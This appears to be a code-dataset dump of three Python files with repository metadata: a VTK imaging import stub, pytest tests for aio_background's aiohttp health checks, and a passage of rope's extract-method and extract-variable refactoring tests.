| 50.932203 | 234 | 0.800166 | 679 | 6,010 | 6.512518 | 0.113402 | 0.089552 | 0.179104 | 0.248756 | 0.794437 | 0.752374 | 0.749661 | 0.724785 | 0.721167 | 0.706015 | 0 | 0.009625 | 0.152912 | 6,010 | 117 | 235 | 51.367521 | 0.858967 | 0.446256 | 0 | 0.214286 | 0 | 0 | 0.139027 | 0.133069 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.142857 | 0 | 0.452381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
162a3ac467a9a6c1ac17d3bf5e2cf46b0025c46b | 31 | py | Python | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | 17 | 2015-02-17T00:30:26.000Z | 2022-03-17T06:13:02.000Z | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | null | null | null | Utilities/VTKPythonWrapping/paraview/vtk/imaging.py | cjh1/ParaView | b0eba067c87078d5fe56ec3cb21447f149e1f31a | [
"BSD-3-Clause"
] | 10 | 2015-08-31T18:20:17.000Z | 2022-02-02T15:16:21.000Z | from vtkImagingPython import *
| 15.5 | 30 | 0.83871 | 3 | 31 | 8.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
16325f943d26febe35c10257dfffcf997ed360a7 | 3,424 | py | Python | tests/test_aiohttp.py | anna-money/aio-background | 5b72dd7e681abab7fe85df129ea4fa5ca2cf6dc7 | [
"MIT"
] | 7 | 2021-11-05T08:02:50.000Z | 2021-11-16T08:58:06.000Z | tests/test_aiohttp.py | Pliner/aio-background | 8498d496707cabecee592008ea322c68b0eb29ad | [
"MIT"
] | 16 | 2021-11-15T09:54:51.000Z | 2022-03-17T00:31:52.000Z | tests/test_aiohttp.py | Pliner/aio-background | 8498d496707cabecee592008ea322c68b0eb29ad | [
"MIT"
] | null | null | null | import asyncio
import aiohttp.web
import aiohttp.web_request
import aiohttp.web_response
import pytest
import yarl
import aio_background
@pytest.fixture
async def server_without_jobs(aiohttp_client):
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
return await aiohttp_client(app)
@pytest.fixture
async def server_with_job(aiohttp_client):
async def run() -> None:
await asyncio.sleep(100500)
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
@pytest.fixture
async def server_with_healthy_job(aiohttp_client):
async def run() -> None:
await asyncio.sleep(100500)
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
@pytest.fixture
async def server_with_unhealthy_job(aiohttp_client):
async def run() -> None:
await asyncio.sleep(0.5)
raise RuntimeError("Oops")
async def health_check(request: aiohttp.web_request.Request) -> aiohttp.web_response.Response:
is_healthy = aio_background.aiohttp_is_healthy(request.app)
return aiohttp.web_response.Response(status=200 if is_healthy else 500)
app = aiohttp.web.Application()
app.router.add_get("/", health_check)
app.cleanup_ctx.append(aio_background.aiohttp_setup_ctx(aio_background.run(run)))
return await aiohttp_client(app)
async def test_aiohttp_without_jobs(server_without_jobs):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_without_jobs.server.host}:{server_without_jobs.server.port}")
response = await client_session.get(url)
assert response.status == 200
async def test_aiohttp_with_healthy_job(server_with_healthy_job):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_with_healthy_job.server.host}:{server_with_healthy_job.server.port}")
response = await client_session.get(url)
assert response.status == 200
async def test_aiohttp_with_unhealthy_job(server_with_unhealthy_job):
async with aiohttp.ClientSession() as client_session:
url = yarl.URL(f"http://{server_with_unhealthy_job.server.host}:{server_with_unhealthy_job.server.port}")
response = await client_session.get(url)
assert response.status == 200
await asyncio.sleep(1)
response = await client_session.get(url)
assert response.status == 500
| 37.626374 | 113 | 0.749416 | 466 | 3,424 | 5.244635 | 0.128755 | 0.077741 | 0.066285 | 0.085106 | 0.859247 | 0.816285 | 0.816285 | 0.816285 | 0.816285 | 0.795008 | 0 | 0.017623 | 0.15479 | 3,424 | 90 | 114 | 38.044444 | 0.826883 | 0 | 0 | 0.686567 | 0 | 0 | 0.073014 | 0 | 0 | 0 | 0 | 0 | 0.059701 | 1 | 0 | false | 0 | 0.104478 | 0 | 0.223881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
167f7984d254f4be25e2554d9f39807e0827d542 | 42,781 | py | Python | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | [
"MIT"
] | null | null | null | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | [
"MIT"
] | null | null | null | leo/external/rope/ropetest/refactor/extracttest.py | frakel/leo-editor | b574118ee3b7ffe8344fa0d00dac603096117ac7 | [
"MIT"
] | null | null | null | try:
import unittest2 as unittest
except ImportError:
import unittest
import rope.base.codeanalyze
import rope.base.exceptions
from rope.refactor import extract
from ropetest import testutils
class ExtractMethodTest(unittest.TestCase):
def setUp(self):
super(ExtractMethodTest, self).setUp()
self.project = testutils.sample_project()
self.pycore = self.project.pycore
def tearDown(self):
testutils.remove_project(self.project)
super(ExtractMethodTest, self).tearDown()
def do_extract_method(self, source_code, start, end, extracted, **kwds):
testmod = testutils.create_module(self.project, 'testmod')
testmod.write(source_code)
extractor = extract.ExtractMethod(
self.project, testmod, start, end)
self.project.do(extractor.get_changes(extracted, **kwds))
return testmod.read()
def do_extract_variable(self, source_code, start, end, extracted, **kwds):
testmod = testutils.create_module(self.project, 'testmod')
testmod.write(source_code)
extractor = extract.ExtractVariable(self.project, testmod, start, end)
self.project.do(extractor.get_changes(extracted, **kwds))
return testmod.read()
def _convert_line_range_to_offset(self, code, start, end):
lines = rope.base.codeanalyze.SourceLinesAdapter(code)
return lines.get_line_start(start), lines.get_line_end(end)
def test_simple_extract_function(self):
code = "def a_func():\n print('one')\n print('two')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n print('two')\n\n" \
"def extracted():\n print('one')\n"
self.assertEquals(expected, refactored)
def test_extract_function_at_the_end_of_file(self):
code = "def a_func():\n print('one')"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n" \
"def extracted():\n print('one')\n"
self.assertEquals(expected, refactored)
def test_extract_function_after_scope(self):
code = "def a_func():\n print('one')\n print('two')" \
"\n\nprint('hey')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'extracted')
expected = "def a_func():\n extracted()\n print('two')\n\n" \
"def extracted():\n print('one')\n\nprint('hey')\n"
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_parameter(self):
code = "def a_func():\n a_var = 10\n print(a_var)\n"
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "def a_func():\n a_var = 10\n new_func(a_var)\n\n" \
"def new_func(a_var):\n print(a_var)\n"
self.assertEquals(expected, refactored)
def test_not_unread_variables_as_parameter(self):
code = "def a_func():\n a_var = 10\n print('hey')\n"
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "def a_func():\n a_var = 10\n new_func()\n\n" \
"def new_func():\n print('hey')\n"
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_two_parameter(self):
code = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' new_func(a_var, another_var)\n\n' \
'def new_func(a_var, another_var):\n' \
' third_var = a_var + another_var\n'
self.assertEquals(expected, refactored)
def test_simple_extract_function_with_return_value(self):
code = 'def a_func():\n a_var = 10\n print(a_var)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = new_func()' \
'\n print(a_var)\n\n' \
'def new_func():\n a_var = 10\n return a_var\n'
self.assertEquals(expected, refactored)
def test_extract_function_with_multiple_return_values(self):
code = 'def a_func():\n a_var = 10\n another_var = 20\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var, another_var = new_func()\n' \
' third_var = a_var + another_var\n\n' \
'def new_func():\n a_var = 10\n another_var = 20\n' \
' return a_var, another_var\n'
self.assertEquals(expected, refactored)
def test_simple_extract_method(self):
code = 'class AClass(object):\n\n' \
' def a_func(self):\n print(1)\n print(2)\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n' \
' self.new_func()\n' \
' print(2)\n\n' \
' def new_func(self):\n print(1)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_args_and_returns(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' a_var = 10\n' \
' another_var = a_var * 3\n' \
' third_var = a_var + another_var\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' a_var = 10\n' \
' another_var = self.new_func(a_var)\n' \
' third_var = a_var + another_var\n\n' \
' def new_func(self, a_var):\n' \
' another_var = a_var * 3\n' \
' return another_var\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_self_as_argument(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(self)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' self.new_func()\n\n' \
' def new_func(self):\n' \
' print(self)\n'
self.assertEquals(expected, refactored)
def test_extract_method_with_no_self_as_argument(self):
code = 'class AClass(object):\n' \
' def a_func():\n' \
' print(1)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_with_multiple_methods(self):
code = 'class AClass(object):\n' \
' def a_func(self):\n' \
' print(self)\n\n' \
' def another_func(self):\n' \
' pass\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n' \
' def a_func(self):\n' \
' self.new_func()\n\n' \
' def new_func(self):\n' \
' print(self)\n\n' \
' def another_func(self):\n' \
' pass\n'
self.assertEquals(expected, refactored)
def test_extract_function_with_function_returns(self):
code = 'def a_func():\n def inner_func():\n pass\n' \
' inner_func()\n'
start, end = self._convert_line_range_to_offset(code, 2, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n' \
' inner_func = new_func()\n inner_func()\n\n' \
'def new_func():\n' \
' def inner_func():\n pass\n' \
' return inner_func\n'
self.assertEquals(expected, refactored)
def test_simple_extract_global_function(self):
code = "print('one')\nprint('two')\nprint('three')\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "print('one')\n\ndef new_func():\n print('two')\n" \
"\nnew_func()\nprint('three')\n"
self.assertEquals(expected, refactored)
def test_extract_global_function_inside_ifs(self):
code = 'if True:\n a = 10\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n a = 10\n\nif True:\n' \
' new_func()\n'
self.assertEquals(expected, refactored)
def test_extract_function_while_inner_function_reads(self):
code = 'def a_func():\n a_var = 10\n' \
' def inner_func():\n print(a_var)\n' \
' return inner_func\n'
start, end = self._convert_line_range_to_offset(code, 3, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a_var = 10\n' \
' inner_func = new_func(a_var)' \
'\n return inner_func\n\n' \
'def new_func(a_var):\n' \
' def inner_func():\n print(a_var)\n' \
' return inner_func\n'
self.assertEquals(expected, refactored)
def test_extract_method_bad_range(self):
code = "def a_func():\n pass\na_var = 10\n"
start, end = self._convert_line_range_to_offset(code, 2, 3)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_bad_range2(self):
code = "class AClass(object):\n pass\n"
start, end = self._convert_line_range_to_offset(code, 1, 1)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_return(self):
code = 'def a_func(arg):\n if arg:\n return arg * 2' \
'\n return 1'
start, end = self._convert_line_range_to_offset(code, 2, 4)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_yield(self):
code = "def a_func(arg):\n yield arg * 2\n"
start, end = self._convert_line_range_to_offset(code, 2, 2)
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_uncomplete_lines(self):
code = 'a_var = 20\nanother_var = 30\n'
start = code.index('20')
end = code.index('30') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_containing_uncomplete_lines2(self):
code = 'a_var = 20\nanother_var = 30\n'
start = code.index('20')
end = code.index('another') + 5
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_function_and_argument_as_paramenter(self):
code = 'def a_func(arg):\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 2, 2)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(arg):\n new_func(arg)\n\n' \
'def new_func(arg):\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_extract_function_and_end_as_the_start_of_a_line(self):
code = 'print("hey")\nif True:\n pass\n'
start = 0
end = code.index('\n') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n print("hey")\n\n' \
'new_func()\nif True:\n pass\n'
self.assertEquals(expected, refactored)
def test_extract_function_and_indented_blocks(self):
code = 'def a_func(arg):\n if True:\n' \
' if True:\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 3, 4)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(arg):\n ' \
'if True:\n new_func(arg)\n\n' \
'def new_func(arg):\n if True:\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_multi_line_headers(self):
code = 'def a_func(\n arg):\n print(arg)\n'
start, end = self._convert_line_range_to_offset(code, 3, 3)
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func(\n arg):\n new_func(arg)\n\n' \
'def new_func(arg):\n print(arg)\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_function(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "\ndef new_func():\n " \
"return 10 + 20\n\na_var = new_func()\n"
self.assertEquals(expected, refactored)
def test_single_line_extract_function2(self):
code = 'def a_func():\n a = 10\n b = a * 20\n'
start = code.rindex('a')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a = 10\n b = new_func(a)\n' \
'\ndef new_func(a):\n return a * 20\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method_and_logical_lines(self):
code = 'a_var = 10 +\\\n 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n ' \
'return 10 + 20\n\na_var = new_func()\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method_and_logical_lines2(self):
code = 'a_var = (10,\\\n 20)\n'
start = code.index('10') - 1
end = code.index('20') + 3
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = '\ndef new_func():\n' \
' return (10, 20)\n\na_var = new_func()\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_method(self):
code = "class AClass(object):\n\n" \
" def a_func(self):\n a = 10\n b = a * a\n"
start = code.rindex('=') + 2
end = code.rindex('a') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class AClass(object):\n\n' \
' def a_func(self):\n' \
' a = 10\n b = self.new_func(a)\n\n' \
' def new_func(self, a):\n return a * a\n'
self.assertEquals(expected, refactored)
def test_single_line_extract_function_if_condition(self):
code = 'if True:\n pass\n'
start = code.index('True')
end = code.index('True') + 4
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = "\ndef new_func():\n return True\n\nif new_func():" \
"\n pass\n"
self.assertEquals(expected, refactored)
def test_unneeded_params(self):
code = 'class A(object):\n ' \
'def a_func(self):\n a_var = 10\n a_var += 2\n'
start = code.rindex('2')
end = code.rindex('2') + 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'class A(object):\n' \
' def a_func(self):\n a_var = 10\n' \
' a_var += self.new_func()\n\n' \
' def new_func(self):\n return 2\n'
self.assertEquals(expected, refactored)
def test_breaks_and_continues_inside_loops(self):
code = 'def a_func():\n for i in range(10):\n continue\n'
start = code.index('for')
end = len(code) - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n new_func()\n\n' \
'def new_func():\n' \
' for i in range(10):\n continue\n'
self.assertEquals(expected, refactored)
def test_breaks_and_continues_outside_loops(self):
code = 'def a_func():\n' \
' for i in range(10):\n a = i\n continue\n'
start = code.index('a = i')
end = len(code) - 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_variable_writes_followed_by_variable_reads_after_extraction(self):
code = 'def a_func():\n a = 1\n a = 2\n b = a\n'
start = code.index('a = 1')
end = code.index('a = 2') - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n new_func()\n a = 2\n b = a\n\n' \
'def new_func():\n a = 1\n'
self.assertEquals(expected, refactored)
def test_var_writes_followed_by_var_reads_inside_extraction(self):
code = 'def a_func():\n a = 1\n a = 2\n b = a\n'
start = code.index('a = 2')
end = len(code) - 1
refactored = self.do_extract_method(code, start, end, 'new_func')
expected = 'def a_func():\n a = 1\n new_func()\n\n' \
'def new_func():\n a = 2\n b = a\n'
self.assertEquals(expected, refactored)
def test_extract_variable(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 2
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'new_var = 10 + 20\na_var = new_var\n'
self.assertEquals(expected, refactored)
def test_extract_variable_multiple_lines(self):
code = 'a = 1\nb = 2\n'
start = code.index('1')
end = code.index('1') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1\na = c\nb = 2\n'
self.assertEquals(expected, refactored)
def test_extract_variable_in_the_middle_of_statements(self):
code = 'a = 1 + 2\n'
start = code.index('1')
end = code.index('1') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1\na = c + 2\n'
self.assertEquals(expected, refactored)
def test_extract_variable_for_a_tuple(self):
code = 'a = 1, 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'c = 1, 2\na = c\n'
self.assertEquals(expected, refactored)
def test_extract_variable_for_a_string(self):
code = 'def a_func():\n a = "hey!"\n'
start = code.index('"')
end = code.rindex('"') + 1
refactored = self.do_extract_variable(code, start, end, 'c')
expected = 'def a_func():\n c = "hey!"\n a = c\n'
self.assertEquals(expected, refactored)
def test_extract_variable_inside_ifs(self):
code = 'if True:\n a = 1 + 2\n'
start = code.index('1')
end = code.rindex('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'if True:\n b = 1 + 2\n a = b\n'
self.assertEquals(expected, refactored)
def test_extract_variable_inside_ifs_and_logical_lines(self):
code = 'if True:\n a = (3 + \n(1 + 2))\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'if True:\n b = 1 + 2\n a = (3 + \n(b))\n'
self.assertEquals(expected, refactored)
# TODO: Handle when extracting a subexpression
def xxx_test_extract_variable_for_a_subexpression(self):
code = 'a = 3 + 1 + 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'b')
expected = 'b = 1 + 2\na = 3 + b\n'
self.assertEquals(expected, refactored)
def test_extract_variable_starting_from_the_start_of_the_line(self):
code = 'a_dict = {1: 1}\na_dict.values().count(1)\n'
start = code.rindex('a_dict')
end = code.index('count') - 1
refactored = self.do_extract_variable(code, start, end, 'values')
expected = 'a_dict = {1: 1}\n' \
'values = a_dict.values()\nvalues.count(1)\n'
self.assertEquals(expected, refactored)
def test_extract_variable_on_the_last_line_of_a_function(self):
code = 'def f():\n a_var = {}\n a_var.keys()\n'
start = code.rindex('a_var')
end = code.index('.keys')
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'def f():\n a_var = {}\n ' \
'new_var = a_var\n new_var.keys()\n'
self.assertEquals(expected, refactored)
def test_extract_variable_on_the_indented_function_statement(self):
code = 'def f():\n if True:\n a_var = 1 + 2\n'
start = code.index('1')
end = code.index('2') + 1
refactored = self.do_extract_variable(code, start, end, 'new_var')
expected = 'def f():\n if True:\n' \
' new_var = 1 + 2\n a_var = new_var\n'
self.assertEquals(expected, refactored)
def test_extract_method_on_the_last_line_of_a_function(self):
code = 'def f():\n a_var = {}\n a_var.keys()\n'
start = code.rindex('a_var')
end = code.index('.keys')
refactored = self.do_extract_method(code, start, end, 'new_f')
expected = 'def f():\n a_var = {}\n new_f(a_var).keys()\n\n' \
'def new_f(a_var):\n return a_var\n'
self.assertEquals(expected, refactored)
def test_raising_exception_when_on_incomplete_variables(self):
code = 'a_var = 10 + 20\n'
start = code.index('10') + 1
end = code.index('20') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_when_on_incomplete_variables_on_end(self):
code = 'a_var = 10 + 20\n'
start = code.index('10')
end = code.index('20') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_on_bad_parens(self):
code = 'a_var = (10 + 20) + 30\n'
start = code.index('20')
end = code.index('30') + 2
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_raising_exception_on_bad_operators(self):
code = 'a_var = 10 + 20 + 30\n'
start = code.index('10')
end = code.rindex('+') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
# FIXME: Extract method should be more intelligent about bad ranges
def xxx_test_raising_exception_on_function_parens(self):
code = 'a = range(10)'
start = code.index('(')
end = code.rindex(')') + 1
with self.assertRaises(rope.base.exceptions.RefactoringError):
self.do_extract_method(code, start, end, 'new_func')
def test_extract_method_and_extra_blank_lines(self):
code = '\nprint(1)\n'
refactored = self.do_extract_method(code, 0, len(code), 'new_f')
expected = '\n\ndef new_f():\n print(1)\n\nnew_f()\n'
self.assertEquals(expected, refactored)
def test_variable_writes_in_the_same_line_as_variable_read(self):
code = 'a = 1\na = 1 + a\n'
start = code.index('\n') + 1
end = len(code)
refactored = self.do_extract_method(code, start, end, 'new_f',
global_=True)
expected = 'a = 1\n\ndef new_f(a):\n a = 1 + a\n\nnew_f(a)\n'
self.assertEquals(expected, refactored)
def test_variable_writes_in_the_same_line_as_variable_read2(self):
code = 'a = 1\na += 1\n'
start = code.index('\n') + 1
end = len(code)
refactored = self.do_extract_method(code, start, end, 'new_f',
global_=True)
expected = 'a = 1\n\ndef new_f():\n a += 1\n\nnew_f()\n'
self.assertEquals(expected, refactored)
def test_variable_and_similar_expressions(self):
code = 'a = 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\na = one\nb = one\n'
self.assertEquals(expected, refactored)
def test_definition_should_appear_before_the_first_use(self):
code = 'a = 1\nb = 1\n'
start = code.rindex('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\na = one\nb = one\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_expressions(self):
code = 'a = 1\nb = 1\n'
start = code.index('1')
end = start + 1
refactored = self.do_extract_method(code, start, end,
'one', similar=True)
expected = '\ndef one():\n return 1\n\na = one()\nb = one()\n'
self.assertEquals(expected, refactored)
def test_simple_extract_method_and_similar_statements(self):
code = 'class AClass(object):\n\n' \
' def func1(self):\n a = 1 + 2\n b = a\n' \
' def func2(self):\n a = 1 + 2\n b = a\n'
start, end = self._convert_line_range_to_offset(code, 4, 4)
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self):\n' \
' a = self.new_func()\n b = a\n\n' \
' def new_func(self):\n' \
' a = 1 + 2\n return a\n' \
' def func2(self):\n' \
' a = self.new_func()\n b = a\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_statements2(self):
code = 'class AClass(object):\n\n' \
' def func1(self, p1):\n a = p1 + 2\n' \
' def func2(self, p2):\n a = p2 + 2\n'
start = code.rindex('p1')
end = code.index('2\n') + 1
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self, p1):\n ' \
'a = self.new_func(p1)\n\n' \
' def new_func(self, p1):\n return p1 + 2\n' \
' def func2(self, p2):\n a = self.new_func(p2)\n'
self.assertEquals(expected, refactored)
def test_extract_method_and_similar_sttemnts_return_is_different(self):
code = 'class AClass(object):\n\n' \
' def func1(self, p1):\n a = p1 + 2\n' \
' def func2(self, p2):\n self.attr = p2 + 2\n'
start = code.rindex('p1')
end = code.index('2\n') + 1
refactored = self.do_extract_method(code, start, end,
'new_func', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self, p1):' \
'\n a = self.new_func(p1)\n\n' \
' def new_func(self, p1):\n return p1 + 2\n' \
' def func2(self, p2):\n' \
' self.attr = self.new_func(p2)\n'
self.assertEquals(expected, refactored)
def test_definition_should_appear_where_it_is_visible(self):
code = 'if True:\n a = 1\nelse:\n b = 1\n'
start = code.rindex('1')
end = start + 1
refactored = self.do_extract_variable(code, start, end,
'one', similar=True)
expected = 'one = 1\nif True:\n a = one\nelse:\n b = one\n'
self.assertEquals(expected, refactored)
def test_extract_variable_and_similar_statements_in_classes(self):
code = 'class AClass(object):\n\n' \
' def func1(self):\n a = 1\n' \
' def func2(self):\n b = 1\n'
start = code.index(' 1') + 1
refactored = self.do_extract_variable(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' def func1(self):\n one = 1\n a = one\n' \
' def func2(self):\n b = 1\n'
self.assertEquals(expected, refactored)
def test_extract_method_in_staticmethods(self):
code = 'class AClass(object):\n\n' \
' @staticmethod\n def func2():\n b = 1\n'
start = code.index(' 1') + 1
refactored = self.do_extract_method(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' @staticmethod\n def func2():\n' \
' b = AClass.one()\n\n' \
' @staticmethod\n def one():\n' \
' return 1\n'
self.assertEquals(expected, refactored)
def test_extract_normal_method_with_staticmethods(self):
code = 'class AClass(object):\n\n' \
' @staticmethod\n def func1():\n b = 1\n' \
' def func2(self):\n b = 1\n'
start = code.rindex(' 1') + 1
refactored = self.do_extract_method(code, start, start + 1,
'one', similar=True)
expected = 'class AClass(object):\n\n' \
' @staticmethod\n def func1():\n b = 1\n' \
